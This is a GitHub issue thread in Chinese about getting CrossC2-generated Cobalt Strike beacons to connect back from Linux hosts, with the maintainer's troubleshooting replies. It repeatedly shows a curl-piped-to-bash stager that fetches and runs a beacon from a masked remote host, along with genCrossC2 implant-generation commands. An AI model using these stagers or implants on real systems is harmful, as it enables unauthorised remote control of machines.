### ISSUE TITLE
下载cs4.1分之后报错：[error]: parse dll!

### ISSUE THREAD

**Issue by qwe0810** [gloxec/CrossC2#82]
执行最终命令的时候报错[error]: parse dll!  且无法cs上线
[root@ro0t CobaltStrike4.1]# curl -A O -o- -L http://**.**.**.**:55413/a | bash -s
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   225  100   225    0     0  45000      0 --:--:-- --:--:-- --:--:-- 45000
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1823k  100 1823k    0     0   135k      0  0:00:13  0:00:13 --:--:--  126k

**Comment by gloxec** [comment]
请尝试使用release v2.2.2版本, 具体无法上线问题会详细显示

**Comment by qwe0810** [comment]
我更新了用v2.2.2版本下也是这个报错[error]: parse dll!
[root@localhost ~]# curl -A O -o- -L http://*.*.*.*:55413/a | bash -s
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   225  100   225    0     0   4224      0 --:--:-- --:--:-- --:--:--  4245
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1823k  100 1823k    0     0   139k      0  0:00:13  0:00:13 --:--:--  128k
[error]: parse dll!
[conf]: alive
[root@localhost ~]#

**Comment by qwe0810** [comment]
没有详细的显示还是

**Comment by gloxec** [comment]
是否替换原来的以及重新生成beacon呢？v2.2.2中删除了这行代码，不会出现"parse dll!"这个的

**Comment by qwe0810** [comment]
确定是替换后的2.2.2版本的 另外cs上也重新进行监听  beacon也是重新生成的命令 现在执行相关curl命令后提示的 [conf]: alive 一直无法上线  但是cs中的web log中显示有请求流量，但就是无法上线

**Comment by qwe0810** [comment]
刚才又重新试了 确实又提示parse dll!  用的确实是2.2.2的版本 beacon也是重新生成的

**Comment by gloxec** [comment]
> 执行相关curl命令后提示的 [conf]: alive 一直无法上线 但是cs中的web log中显示有请求流量
> 又提示parse dll! 

这两个动作都是以前版本的代码，2.2.2删除了这两个相关的代码，是不会出现的，怀疑是你的cs中部署的sites未删除，可以在Sites中kill掉之前的自动生成的URI，或者填写新端口或URI等

**Comment by qwe0810** [comment]
现在又有：[error]: load dll的提示

**Comment by gloxec** [comment]
你去确定下下载版本吧，load dll与parse dll都是旧版本的提示，新版均使用 ` error: xxx lib: 错误详细原因` 这种提示格式

**Comment by gloxec** [comment]
在Attacks->Web Drive-by->Manage中kill之前部署的旧版本beacon

**Comment by qwe0810** [comment]
都kill掉了 还有这种情况 我欢迎cobalt-strike是有缓存

**Comment by qwe0810** [comment]
而且现在是macos 我可以上线 就是linux无法上线 但是在cs能收到请求监听端口的报错，就是无法上线 很奇怪 [error]: load dll

**Comment by qwe0810** [comment]
确定下载的是最新版本 每次都在mannager中kill之前的 重新生成，真的想不通为什么还有[error]: parse dll!  [error]: load dll的这类问题 好想不通

**Comment by qwe0810** [comment]
我知道怎么回事了 我之前下载的v2.2.2 - stable里面的源代码src里面 里面的genCrossC2.Linux 相关都是旧版本，所以 得下载2.2.2版本最外面的那个genCrossC2.Linux

**Comment by qwe0810** [comment]
现在重新下载新版本后报错：
[error]: [parse lib]: /tmp/.sys.rrcache.data: invalid ELF header!
[error]: [parse lib]: ./.sys.rrcache.data: invalid ELF header!
[error]: [parse symbol]: (null)!
[conf]: alive

**Comment by qwe0810** [comment]
另外在我linux主机下生成payload再次执行也不是不行的 但是我在我macos下执行相关macos是可以上线的：
[root@ro0t src]# ./genCrossC2.Linux x.x.x.x. 8081 null ./lib_rebind_test.so Linux x64 /root/plugins_cobaltstrike/CrossC2-v2.2.2/src/test33
[root@ro0t src]#chmod -R 777 test33
[root@ro0t src]# ./test33
[root@ro0t src]# [error]: [parse lib]: /proc/self/fd/3: invalid ELF header!
[error]: [parse symbol]: (null)!
[conf]: alive
其中./lib_rebind_test.so 是使用默认的c2profile.c编译生成的，服务端也使用了你这边提供的https.profile
如果我使用的参数里面不加./lib_rebind_test.so 使用null
./genCrossC2.Linux x.x.x.x. 8081 null null Linux x64 test44
就没有上面“ invalid ELF header!”的报错 是不是这个 .so 与profile的文件的报错，但是仍然无法成功上线，cs-log中一直能收到请求，就是无法上线，

**Comment by qwe0810** [comment]
ok 了 解决了 是我在linux下使用的./lib_rebind_test.so 是之前在Mac用clang编译生成的，所以报错 所以在linux下用gcc编译 哎着业余错误，经过gcc编译 可以上线 不过现在虽然能上线 但是还有 [error]: write dll 的报错，不知道什么原因

**Comment by gloxec** [comment]
>  ...虽然能上线 但是还有 [error]: write dll 的报错...
v2.2.2 内置了多种上线的方式，会不断的尝试所有方法，直到成功上线或者所有都运行完毕退出。
所以这里这里成功上线但缺报错是很正常的，下个版本考虑将该错误也添加详细原因。
